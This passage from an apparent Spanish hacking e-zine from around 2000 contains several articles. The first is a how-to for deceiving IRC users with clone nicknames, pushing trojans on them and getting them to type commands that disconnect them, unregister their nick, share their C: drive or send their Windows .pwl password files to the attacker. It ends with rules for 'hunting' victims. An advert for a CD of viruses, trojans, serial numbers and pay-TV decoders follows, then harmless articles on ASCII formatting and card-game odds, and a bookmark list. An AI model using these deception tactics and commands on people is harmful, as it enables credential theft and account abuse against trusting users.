debe estar en un canal y nosotros en otro ya que el servidor de IRC detecta expone en medio del canal los clones que tenemos y no es plan que nuestra victima vea por vamos. Seguimos, ya tenemos el clon en #mas_amor donde se encuentra la victima y nosotros en #amor, donde tambien se encuentra la victima. Pues le decimos a la victima que fulano (nuestro clon) tiene una lista de personas que buscan pareja, o regala entradas para el futbol, o regala videos porno (joder con fulano ) o lo que sea que le interese, entonces la victima procedera a hacerle un privado donde se encuentre nuestro clon y a pedirselo... Que no cuela lo de la frase o lo del troyano ?? pues el unico que habra fracasado sera nuestro clon, ya que nosotros aparentaremos no saber nada del tema de lo que el intentaba hacer y la victima seguira hablando con nosotros... Y aun no la hemos perdido, podemos probar con otro clon cambiando la tecnica, y asi las veces que haga falta... De esta manera *atamos* la victima a nosotros y la confiamos a unos clones que si no la enga~an a la primera lo haran a la segunda, o a la tercera... Este metodo funciona la gran mayoria de veces exceptuando aquella gente que no es tan inocente o que no son tan novatos. (--3--)- Como se consigue el enga~o ? -(---------------------------------) Ahora vamos a tratar la ingenieria social desde sus bases mas generales, si es que se puede decir asi, explicando en que consiste el enga~o mas detalladamente para que sepais en que se basan los tipos de enga~os ya vistos. El enga~o se consigue al hacer que la atencion de una persona recaiga sobre ti, confiando en ti, y consiste en hacer que la victima, en un exceso de confianza, de el visto verde a todo lo que le digas porque para el eres alguien que sabe que no le hara nada malo. Una vez has llegado a hacer que la victima centre tu atencion en ti, que responda a todos los privados que la haces rapidamente, que se ofrece muy simpatico y demas, es que te tiene en su lista de amigos... Y es en ese momento donde se le sugiere a la victima que haga esto o lo otro favoreciendote a ti. Cuando la victima haya accedido a lo que tu le hubieras pedido y hayas conseguido tu objetivo, lo eticamente recomendable para no herir a la victima seria hacerte amigo de el/ella diciendole que lo que has hecho no era para fastidiarle y que no le has hecho nada malo, y si la victima no se lo toma mal pues ya tienes otro amigo :-). Eso es ser un buen ingeniero social, eso y no otra cosa. Se que algunos esto ya lo sabiais pero no olvideis que este texto intenta ser muy ameno y de facil comprension para todos los leen esto ( no es que vea a muchos... ) (--4--)- Mas trucos -(---------------------------------------------------) Ahora que estais de verdad mentalizados de lo que es ser un ingeniero social, os voy a armar con un peque~o arsenal de trucos que nunca vienen mal. Todas estas frases tienen que ser introducidas por la victima y provocan efecos secundarios. o.o.o.o.o.o.o.o. /server opme <--- Le desconecta del IRC. o.o.o.o.o.o.o.o. o.o.o.o.o.o.o.o.o.o.o. /msg nickserv kill <--- Le desregistra el nick. o.o.o.o.o.o.o.o.o.o.o. o.o.o.o.o.o.o.o.o.o. /join 0 helpdesk <--- Se va de todos los canales. o.o.o.o.o.o.o.o.o.o. o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o /send c:\windows\*.*pwl tu_nick <--- Te manda todas sus .pwl ;) o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o o.o.o.o.o.o.o.o.o.o.o.o.o /fserve tu_nick 5 c:\ <--- Ver "el arte de la ingenieria social". o.o.o.o.o.o.o.o.o.o.o.o.o o.o.o.o.o.o.o.o.o.o.o.o.o Inicio/ejecutar/con/con (esta no se introduce desde el cliente de IRC) o.o.o.o.o.o.o.o.o.o.o.o.o (--5--)- Los consejos del abuelo -(--------------------------------------) Aqui van algunos consejos para que vuestra labor como ingenieros sociales sea fructifera. Se podria decir como los mandamientos de todo ingenierio social precavido. Regla num.1 " Antes de ir a cazar una victima, preguntate a ti mismo, que es lo que deseas obtener de el, como se lo tomara, y como se lo debes proponer. Piensalo cosa de dos minutos, relajate y comienza a hablar con el. " Regla num.2 " Al primero que deberas saber enga~ar no es a otro que tu mismo, debes proponerselo a la victima de tal manera que si te lo hicieran a ti tu no sospecharas nada. " Regla num.3 " Aqui no conoceras a nadie por su nick, no te fies de las apariencias, pues enga~an. " Regla num.4 " Nadie regala nada, si quieres que la victima acceda a lo que propones por lo menos le debes haber ofrecido algo. " Regla num.5 " Cuando las cosas se ponen malas, vete, desconectate y vuelvete a conectar con otro nick y otros datos, y no entres en el canal de la victima hasta que esta se haya ido. " Regla num.6 " Debes de conocer a la victima casi tanto como a ti mismo, conoce sus gustos, sus debilidades y todo lo que puedas. " Regla num.7 " Nunca te enfades con tu victima antes del enga~o. " Regla num.8 " No destruyas ninguna informacion ni hagas mal uso de la que le cojas, a no ser que haya fotos infanticidas, si es ese el caso, borralas. " Estas son las reglas basicas, pero no las unicas. (--6---- Despedida ------------------------------------------------------) Antes de irme querria aclarar dos asuntos pertinentes al anterior articulo que se publico en este mismo ezine: Primero que lettera ha sufrido una reestructuracion total de manera que no hace falta estudiarse las cookies. Y segunda que gracias a algunos miembros de la scene mi idea de cuando comenzaba el tercer milenio ha cambiado, ahora no estoy ni en un bando ni en otro, no estoy seguro de la existencia del a~o cero y prefiero seguir leyendo sobre ello... Y como mi madre me dice que irse sin despedirse de los demas es de mala educacion es de mala educacion, no me voy a ir de aqui sin saludar a... Doing, a Ripe y a g.legend. " Eche que entra en un bar y dise... " Tahum. (tahum@demasiado.com) *EOF* -< 0x07 >-------------------------------------------------.--------------.-- `-[ SET Staff )-ï Es un pajaro?.... Es un avion? .... Es un ovni? .... NO!. Es 'Er Pako Underground'. Ole la raza. Un CD repleto de info underground que Er Paco puso a disposicion de SET alla por fines del 99/principios del 00 pero que con la habitual disposicion organizativa que nos caracteriza no aparecio comentado en SET 22 tras lo cual Er Pako reenvio cinco, si 5, copias de la nueva y mejorada version Dejemos que el representante oficial de Pakosoft nos lo cuente.. ER_PAKO UNDER: - Cursos y Tutoriales: ha sido a~adidos nuevos cursos y se han quitado los obsoletos. - Docs Varios: A~adidos algunos textos informaticos y algo de papiroflexia - Imagenes varias: alguna que otra nueva. - Intros: Nada nuevo. - Mini distribuciones linux: A~adida la HV Linuz 0.22. - Risa: - Bastantes chistes e historias nuevas, nuevas secciones de imagenes graciosas, sonidos musica y videos cachondos (genial). - Canal +: nuevas versiones de los programas de descodificacion - Docs. Hack: actualizacion total, cantidad de textos. - E_Zines: en la seccion estrella han sido a~adidos todas la publicaciones nuevas qye han aparecido, asi como los nuevos numeros de las ya existentes. - Numeros de serie: A~adidas nuevas versiones de los programas. - Paginas Webs Hackeadas: nueva seccion. - Personalizacion de Windows: Nueva seccion en la que encontraras facilidades y programas para darle un nuevo aire a tu Windows, especial mencion a las modificacion del explorer.exe hecha por mi con la que tu boton inicio pasare a llamarse ER_PAKO. - Proteccion de CDs: nueva, sin comentarios. - Utilidades Hack: Totalmente actualizada. - Virus: Coleccion personal de Virus compuesta por mas de 15.000 diferentes, codigos fuente, troyanos, creadores, informacion.. Ademas en plena bonanza economica, Espa~a va bien, Pakosoft lanza: Er Pako Programas, un completo CD con todo lo necesario para que un ordenador recien estrenado se convierta en una estacion totalmente equipada con todos los programas que son imprescindibles para trabajar y/o divertirse. Er Pako agradece a las siguientes webs el trabajo realizado y os recomienda que no les quiteis el ojo de encima. ZINE_STORE: Un trabajo muy currado: es de donde me he bajado muchos de los E_ZINES hispanos que podeis encontrar en mi CD. Surf.to/zs La Taberna de Van Hackez: Un poco descuidada ultimamente pero muy buena ante todo y bien clasificada. www.vanhackez.com. El Portal: Actualizan a diario, es muy clara y las webs asociadas por lo general son muy buenas. Elportal.metropoli2000.net. DarkPort: Otro buen portal de temas Hack. Darkport.cjb.net El agujero Negro: Buena web variada, lastima que no actualicen mas a menudo. Agujero.com Y por supuesto a vosotros, los miembros de SET, la gloria del Hack espa~ol, y ademas originarios de MURCIA, (yo de un pueblo de la costa Murciana). Er_Pako *EOF* -< 0x08 >-------------------------------------------------.----------------.- `-[ RagPutana )-ï /-------------------------------------------------------------------\ \ __ / / | O| \ \ |__| _ _ _ / / || __ ___ __ (_ ( _) ___ \ \ (__) (__) (_ (__) (__) (_ (__) _) (_) (_ / / ======================|============================== \ \ t / / ____ _____ _____ ___ ___ \ \ ___ _ ___ #____# #____ # # # / / | (_ \/ | __ # # # # # # \ \ | (_ /\ | (__) # # _____# #_____ _#_ _#_ / / ======================================================== \ \___________________________________________________________________/ -=================================================- Por //RagPutana\\ para la gente de "SET Ezine" -=================================================- Email:ragputana@yahoo.com Seguramente este articulo no tenga que ver mucho con el hacking, dado que no aporta gran cosa al excelente trabajo que estan haciendo la gente de SET . Pero si tenemos en cuenta que en el mundo UNDERGROUND el uso de texto en formato ASCII es lo mas habitual a la hora de redactar Ezines y toda clase de manuales, por que no dedicar unas lineas a este tema. Y es asi como me teneis aqui escribiendo sobre el texto en ASCII. Este articulo pretende ser una ayuda a la hora de escribir y formatear texto en ASCII, y asi conseguir que la gente que quiere dar sus ideas a conocer disfrute de este precioso y agradable formato con todas sus ventajas. (no hay ni que decir que el Ezine SET tiene un formato ASCII elegante, me encanta ;-) _____________________________________________ Este articulo tiene los siguientes apartados: (A)- POR QUE USAR "ASCII"? (B)- COMO USARLO. (C)- RECURSOS "ASCII" EN LA RED. _____________________________________________ Y sin mas preambulos nos centramos en el asunto, y empezamos por enterarnos que es eso del texto ASCII. (para la gente mas quisquillosa o como curiosidad A.S.C.I.I. es "American Standard Code for Information Interchange"(creo), in spanish "Codigo Standar Americano para Intercambio de Informacion" le podriamos llamar CSAII he,he!) ========================== (A)- POR QUE USAR "ASCII"? ========================== Ya creo que a estas alturas estaras bastante convencido de la utilidad de este formato, ya que estas leyendo estas lineas escritas en ese formato, si no es asi sigue con la lectura a ver si logro convencerte. Nos os voy a dar 1000 razones, solo me conformo con las siguientes 3 que me parecen que son las mas solidas, y que a mi realmente me convencen. Son estas las razones por las que el formateo en ASCII es ideal para el mundo UNDER, y las que facilitan la libertad de informacion: 1.- ES UN STANDAR. El formato es standar, eso quiere decir que se puede leer desde distintas maquinas, sistemas operativos, o programas. Con esto un hacker puede lograr que lo que el quiere decir llegue lo mas lejos posible, y que nadie tenga ninguna traba a la hora de leer esto. Es tan estandar que mi viejo MSX (un ordenata de los 80) usa el mismo codigo. Ademas hay que tener en cuenta que no salen nuevas versiones, como nos puede pasar con un documento escrito en WORD 97, que no es posible abrirlo con WORD 6.0, por lo que tenemos que actualizar esa birria de procesador de textos una y otra vez. 2.- OCUPA POCO ESPACIO. La informacion que se guarda con este formato es solo texto, por lo que ocupa mucho menos que cualquier otro formato como puede ser el el WORD de Micro$oft. Ademas pierde un gran volumen al ser comprimido por ZIP, se queda en un 45 o 30%. Todo esto hace que se pueda guardar una gran informacion en muy poco espacio. Esto produce que el gasto telefonico sea lo mas peque~o posible a la hora de bajar informacion de la red, en 5 minutos se pueden bajar manuales que dan mas de 5 horas de lectura (una ganga, por cierto yo mismo me devoro toda clase de manuales en mis ratos libres y es una lectura que no me cuesta casi nada, por no decir nada ;-) 3.- SE PUEDE MODIFICAR. El texto producido en formato ASCII esta abierto a modificaciones, se puede cortar, pegar, borrar... asi el lector puede mejorar y aprovechar lo que se escribe. Asi la informacion contenida en este formato puede ir mutando y por supuesto ira mejorando con el tiempo. (como un buen vino, aunque al final caduque he,he!) Esto produce que los creditos puedan ser facilmente cambiandos, pero aun asi el hacker confia bastante en el lector. (Yo personalmente no conozco ninguna situacion en la que alguien haya cambiado los creditos) Como veis todas estas razones van unidas a la LIBERTAD DE INFORMACION que reclama la etica hacker. Supongo que si lees este Ezine estaras de acuerdo con todo lo aqui dicho, aun asi estoy abligado a recordar que simplemente es mi opinion, y que quizas tu no estes de acuerdo y que lo dicho por mi te parezca una chorrada.(por que no?:-P) ================= (B)- COMO USARLO. ================= A la hora de usar este formato realmente no hay ninguna regla escrita, por lo tanto el limite esta mas o menos en la imaginacion y habilidad que cada uno tenga. Tan solo tener unas cuantas pautas como las que nos dan desde SET: _________________________________________________________________________ ________________________[pautas de SET]__________________________________ Tratad de respetar nuestras normas de estilo. Son simples y nos facilitan mucho la tarea. Si los articulos los escribis pensando en estas reglas, nosotros podremos dedicar mucho mas tiempo a escribir mas articulos y al Hack ;) - 80 COLUMNAS (ni una mas, que no me pagan por maquetar lo ajeno!) - Usa los 127 caracteres ASCII, esto ayuda a que se vea como dios manda en todas las maquinas sean del tipo que sean. El hecho de escribirlo con el Edit de DOS no hace tu texto 100% compatible pero casi. Mucho cuidado con los dise~os en ascii que luego no se ven bien. Sobre las e~es, cuando envias un articulo con ellas nos demuestras que esto no lo lee nadie. __________________________________________________________________________ Por si alguien no sabe cuales son los 127 caracteres de ASCII de que nos hablan, he recogido la siguente lista: _____________________________________________________________________ __________[Regular ASCII Chart (character codes 0 - 127)]____________ 000 (nul) 016  (dle) 032 sp 048 0 064 @ 080 P 096 ` 112 p 001  (soh) 017  (dc1) 033 ! 049 1 065 A 081 Q 097 a 113 q 002  (stx) 018  (dc2) 034 " 050 2 066 B 082 R 098 b 114 r 003  (etx) 019  (dc3) 035 # 051 3 067 C 083 S 099 c 115 s 004  (eot) 020  (dc4) 036 $ 052 4 068 D 084 T 100 d 116 t 005  (enq) 021  (nak) 037 % 053 5 069 E 085 U 101 e 117 u 006  (ack) 022  (syn) 038 & 054 6 070 F 086 V 102 f 118 v 007  (bel) 023  (etb) 039 ' 055 7 071 G 087 W 103 g 119 w 008  (bs) 024  (can) 040 ( 056 8 072 H 088 X 104 h 120 x 009 (tab) 025  (em) 041 ) 057 9 073 I 089 Y 105 i 121 y 010 (lf) 026 (eof) 042 * 058 : 074 J 090 Z 106 j 122 z 011 (vt) 027  (esc) 043 + 059 ; 075 K 091 [ 107 k 123 { 012 (np) 028  (fs) 044 , 060 < 076 L 092 108 l 124 | 013 (cr) 029  (gs) 045 - 061 = 077 M 093 ] 109 m 125 } 014  (so) 030  (rs) 046 . 062 > 078 N 094 ^ 110 n 126 ~ 015  (si) 031  (us) 047 / 063 ? 079 O 095 _ 111 o 127  ______________________________________________________________________ Como veis son estos 128 los caracteres que corresponden a cada numero, y los que son totalmente standares casi en cualquier maquina. Los que funcionan siempre son los del 33 al 126. Los demas dan problemas. Si os habeis fijado no hay ni e~e, ni tildes, esto es un problema a la hora de escribir en castellano. Como solucion se suprimen las tildes y en lugar de la e~e se usa el codigo 126 ~. Por cierto si alguien que esta leyendo esto no sabe como escribir, ~, {, }, ?... o cualquier otro simbolo hay un peque~o truquillo: Se mantiene ALT pulsado y con la otra mano se teclea en el teclado numerico el codigo que corresponde al caracter, despues se suelta ALT y aparece el caracter. ALT + 126 (teclado numerico) = ~ Otra cosa que tendriamos que hacer, seria comprobar como se ve el texto con diferentes editores, por lo menos habria que probarlos con los siguientes, ya que todos no usan el mismo salto de linea: En Windows: EDIT del dos y el Block de notas. (esto como minimo) Linux : Cualquiera, pico, vi... Cuando hagamos la prueba con mayor cantidad de editores mas seguros estaremos de la compatibilidad del texto. Tambien es conveniente que nos fijemos como estan escritos los textos de los demas, es asi como se aprende la mayoria de las cosas. (osea que ya sabeis leer mucho SET). Al escribir o leer un articulo no os quedeis solo con el contenido, mirad y apreciar el formato, es algo que se agredece mucho. No estaria de mas que intentarais crear vuestro ASCII-ART.(se le llama asi a los dibujos creados con caracteres ASCII, como el titulo de este articulo, que por cierto es un poco chapucero ;-) ================================ (C)- RECURSOS "ASCII" EN LA RED. ================================ Principalmente os recomiendo que visiteis sitios que traten sobre "ASCII ART". Como recomendacion en estos sitio podeis encontrar gran cantidad de ejemplos, asi como recopilaciones comprimidas en ZIP: The Great Ascii Art Library. http://www.geocities.com/SouthBeach/Marina/4942/ascii.htm The Ascii Art Dictionary (Andreas Freise) http://www.ascii-art.de Ascii Art en castellano: http://www.euskalnet.net/puravida/asciiart.html Tambien podeis ir a las NEWS, aqui podreis ver trabajos hechos casi por cualquiera o pedir ayuda para encontrar algo concreto. La verdad es que hay gente muy maja que siempre ayuda: NEWS: alt.ascii-art Si vais a consultar las news en un programa como Outlook o cualquier otro, teneis que escojer un tipo de letra que tenga todas las letras del mismo tama~o como "Courrier New", si no el ASCII ART no se podra apreciar. Tambien hay algunos editores para editar texto ASCII que nos ofrecen algunas facilidades como el ajuste linea automatico, a mi personalmente no me gustan, pero os recomendio que los probeis. Realmente no se si este ultimo apartado tiene mucho sentido, ya que es suficiente poner ASCII en cualquier buscador y seguramente __________________________________________ podreis encontrar graficos _________[Ejemplo de ASCII ART]___________| como el que veis aqui ) ( | a la izquierda. /( (\___/) )\ _____________ | ( #) \ (- -) ( # | '\\\\\\ | Si vuestra imaginacion no os ||___c\ >'__| | ' ____|_ | da para ver lo que esta ||**** )`_/ **' | + '||:::::: | dibujado yo os echo una mano: .__ |'* ___| |___*' | '||_____| | \_| |'*( ~ ,)' \'_______|_____| | " Es un diablo con su )) |' /(. ' .)\ ___/____|___\___ | ordenata" (( _""";!___*_____\_| _ ' <<<:|| / /| |_________'___o_o|| Seguramente es uno de esos /_____/ / | hackers que ha hecho algun |:____|/ | pacto con el mismo demonio. __________________________________________| Yo personalmente prefiero seguir aprendiendo en esto del hacking que dejar mi alma por ahi. Alla vosotros si os seduce la idea de vender vuestro alma por convertiros en un "superhacker". Si alguien puede escribir sobre una experiencia como esta que se anime a hacer un articulo, que miedo! =:-{ ======================================================================= Supongo que todo lo expuesto aqui puede servir como ayuda para empezar lo demas va a vuestra cuenta y sois vosotros los que teneis que hacerlo ======================================================================= Saludos a todo el mundo que se mueve por el hacking y hasta otra. ___________________________________ (no copyright) RagPutana Mayo 2.000 _-==============================-_ [ Editor: Parece que por fin esta empezando a calar eso de tomarse un poco la molestia de formatear los articulos y apreciar el ASCII ] -< 0x09 >-------------------------------------------------.---------------.-- `-[ Hendrix )-ï Como ganar al 7 y medio ----------------------- 1. Introduccion Pues aqui estoy otra vez con otro nuevo estudio matematico-estadistico-inutil de como ganar a otro juego de azar. En este caso he analizado el juego del 7 y medio. El juego es tan conocido que el que no sepa jugar que aprenda primero, porque no pienso rebajarme a explicar un juego tan cutre. En el juego hay dos situaciones basicas: Ser la Banca Ser un jugador normal Como la banca gana en caso de empate, a priori es evidente que tiene mas posibilidades de ganar que el resto de jugadores. Por ello siempre que podamos seremos banca. 2. Jugador normal Cuando le toca el turno a jugador, este tiene una carta escondida y dos opciones posibles: Pedir carta o plantarse. Es evidente que si tienes un 1 pediras otra carta (a menos que quieras pegarte un Farol), en cambio si tienes un 7 las posibilidades de pasarte son muy grandes. El problema se resume en: Pido carta o me planto? La respuesta estadistico-matematica es clara: Si tienes mas posibilidades de no pasarte que de pasarte, entonces pide otra carta. Pero, que posibilidades tengo de pasarme con un "6" si pido otra carta?. Pues contemos las cartas. Suponiendo que hay 1 baraja con los numeros de 1 al 7 y tres figuras (sota, caballo y rey) tenemos 40 cartas. Por lo que el 50% lo obtenemos con 20 cartas. Seguimos contando; hay 12 figuras, por lo tanto hay una probabilidad de 12/40 de sacar 1/2, osea un 30%. De esto deducimos que hay, en principio, un 70% de posibilidades de pasarte si tienes un "7" y pides otra carta. Y con un "6"?, pues las combinaciones para no pasarse son dos: que salga un 1 o que salga una figura, en total 16 combinaciones (4 ases y 12 figuras) osea, un 16/40 = 40% de posibilidades de no pasarte. Tabla comparativa Tienes un: Combinaciones favorables Probabilidad de triunfar si pides otra carta 7 12 figuras(1/2) = 12/40 30% 6 12 + 4 ases = 16/40 40% 5 2, 1 o 1/2 = 20/40 50% 4 3, 2, 1 o 1/2 = 24/40 60% 3 4, 3, 2, 1 o 1/2 = 28/40 70% etc... En vista de esta primera tabla se deduce lo siguiente: Si tienes un 4 o menos debes pedir carta, si tienes un 6 o mas debes plantarte y si tienes un 5 es indiferente lo que hagas. Aunque no lo hemos mencionado, el caso de tener "6" o tener "6 y 1/2" es identico ya que si sale un "2" nos pasamos igualmente en ambos casos. 1. Contar las cartas Hasta ahora hemos supuesto probabilidades sobre la baraja completa (40 cartas) pero lo cierto es que en una partida normal hay muchas cartas que estan sobre la mesa y si las contamos podemos variar las probabilidades finales. Por ejemplo, Imagina que el primer jugador se ha pasado ya que tenia un 4 y le ha salido un 7. Tu eres el segundo jugador y tienes un 5, sigue siendo la probabilidad de pasarte del 50%?, No. En este caso deberias descontar el "4" y el "7" del primer jugador y tu propio "5", sigue habiendo 20 cartas a tu favor pero solo 17 en contra. O sea la probabilidad es de 20/37 = 54% de no pasarte. En cambio si el primer jugador hubiera sacado 3 figuras y dos "2" sin pasarse significa que hay 6 cartas por debajo de 3 sobre la mesa (las 5 vistas del primer jugador mas la que tiene escondida que seguro que es menor de 3). En este caso, tus posibilidades de no pasarte son: 14/33 = 42% Conclusion: plantate. En general si han salido muchas figuras y pocos numeros altos es mejor plantarse, si es al reves es mejor pedir. 2. Sacar 7 y 1/2 Por el momento no hemos contemplado la regla que dice que sacando 7 y medio la banca paga el doble. Este hecho es muy importante ya que las probabilidades cambian completamente. Concretamente la esperanza de ganar es igual a la probabilidad de ganar por el valor del premio. (E = p * premio). Hasta ahora estabamos suponiendo que el premio era siempre igual a "1", pero en el caso de "7 y 1/2" el premio es igual a "2". De este modo la esperanza de ganar teniendo 7 y pidiendo una carta es: 12*2 / 40 = 60 % O sea que cuando tienes un 7 lo mejor es pedir carta, ya que el riesgo de pasarte queda compensado con el premio doble que supone sacar 7 y medio. Tabla comparativa Tienes un: Combinaciones favorables Probabilidad de triunfar si pides otra carta 7 12*2/40 60% 6.5 [4*2 + 12]/40 50% 6 [4 + 12]/40 40% 5.5 [4*2 + 4 + 12 ]/40 60% 5 [4 + 4 + 12]/40 50% 4.5 [4*2 + 4 + 4 + 12]/40 70% 4 [4 + 4 + 4 + 12]/40 60% Explicacion: En el caso de 5.5 hay cuatro "2" en la baraja que provocarian un 7 y 1/2 si saliesen, por lo tanto tienen un valor doble. Los resultados son curiosos sobre todo en el caso del 5.5 ya que las probabilidades de que merezca la pena pedir otra carta son claramente favorables. Nos sigue quedando los casos del 6.5 y el 5 donde la probabilidad es del 50% y no sabemos que hacer. En estos casos yo pediria carta ya que podriamos llegar a 5.5 o a 7 y entonces pedir una segunda carta. Por otro lado no olvidemos contar las cartas ya que modifican las probabilidades!!! En resumen: Siempre pedir carta a menos que tengas un 6 o que hayan salido mas figuras que cartas altas 3. Cambiar las reglas El juego del 7 y 1/2 es muy simple y seguramente cuando juegues alguna partida llegaras a las mismas conclusiones haciendo calculos que por intuicion o por experiencia. Esto es debido a la Ley del Jugador Experto (inventada por mi) que dice que: "Un jugador experto, inconscientemente, tiende a realizar siempre las mejores jugadas desde el punto de vista matematico-estadistico". O lo que es lo mismo, hacer calculos no te garantiza el ganar, tan solo te garantiza que tus jugadas son tan buenas como las de un autentico jugador experto en el juego. Asumiendo esta ley, la mejor manera para ganar al jugar con jugadores expertos es cambiar las reglas del juego. De este modo las probabilidades de ganar cambian y el jugador experto pierde toda su experiencia. En cambio el matematico puede recalcular las probabilidades y seguir jugando al maximo nivel. En el caso del siete y medio hay una variante muy conocida que cambia todas las combinaciones: El truco consiste en utilizar una baraja entera y proponer que el "8" y el "9" valgan 1/2. En este caso el numero de cartas pasa a 48 y el numero de cartas que valen 1/2 pasa a 20. los resultados son: Tienes un: Combinaciones favorables Probabilidad de triunfar si pides otra carta 7 20*2/48 83% 6.5 [4*2 + 20]/48 58% 6 [4 + 20]/48 50% 5.5 [4*2 + 4 + 20]/48 66% 5 [4 + 4 + 20]/48 58% 4.5 [4*2 + 4 + 4 + 20]/48 75% 4 [4 + 4 + 4 + 20]/48 66% O sea, que hay que pedir carta SIEMPRE. Esto significa que la banca acabara arruinada. Recordemos que en anterior caso la banca ganaba por defecto. (Me falta por calcular las probabidades de ganar de la banca en ambos casos pero eso tendria que calcularlo haciendo simulaciones) 4. Despedida Supongo a nadie le interesa lo mas minimo mis idas de pelota matematicas con los juegos de azar (la ruleta, los chinos, el 7 y 1/2, etc..). Pero si te interesa el tema hacker-ludopata no dudes en mandarme un mail a hendrix66@iname.com o hendrix@lettera.net, Hasta otra Hendrix -< 0x0A >-------------------------------------------------.---------------.-- `-[ SET Staff )-ï B_ O_ O_ K_ M_ A_ R_ K_ S_ Nuestro Bookmark de este numero tiene nuevas web que hemos considerado curiosas. Sois libres de enviarnos mas direcciones que considereis utiles o interesantes. A la direccion de siempre : --[ http://www.ntop.org ] Util programa para estar al tanto del trafico que circula por nuestra red, incorpora un peque~o servidor web (con algun que otro fallo de seguridad reportado) y puede servir de ayuda en mas de una ocasion. --[ http://www.antioffline.com ] Podriamos decir que esta pagina es un 'tributo' de Sil a JP pero eso la convertiria en una mas de las multiples paginas dedicadas al mismo fin. Ademas de eso Antioffline esconde varias sorpresas. --[ http://inmunix.org ] Aterrado por los desbordamientos de buffer?. Segun todos los estudios siguen constituyendo el metodo preferido y mas comun de ataque. Aparte de rezar puedes intentar protegerte usando un sistema operativo como Inmunix, una version especial de Red Hat Linux que pretende estar "inmunizada" ante este tipo de fallos. --[ http:////www.freeweb.pdq.net/headstrong/ ] Solo dire el titulo de la pagina y ya podeis empezar a imaginar. "Bizarre Stuff You can Make in your Kitchen". --[ http://www.napster.com ] Dudo que haya alguien que no conozca esta pagina, pero como no esta muy claro si seguira abierta (al menos en su actual forma) os recomendamos que aprovecheis para ir y fastidiar a la RIAA. --[ http://www.404.org ] Entre otras cosas, revistas en la que se mezclan filosofia, biologia, diatribas anti-sistema, estudios satiricos de la Biblia, la vision personal del mundo de su autora y la mafia en Minneapolis... Espera cualquier cosa menos algo convencional. --[ http//www.mcs.kent.edu/docs/general/hackersdict/03Appendices ] Una mirada nostalgica, ya se sabe que cualquier tiempo pasado fue mejor e indudablemente en ocasiones tambien mas divertido. *EOF*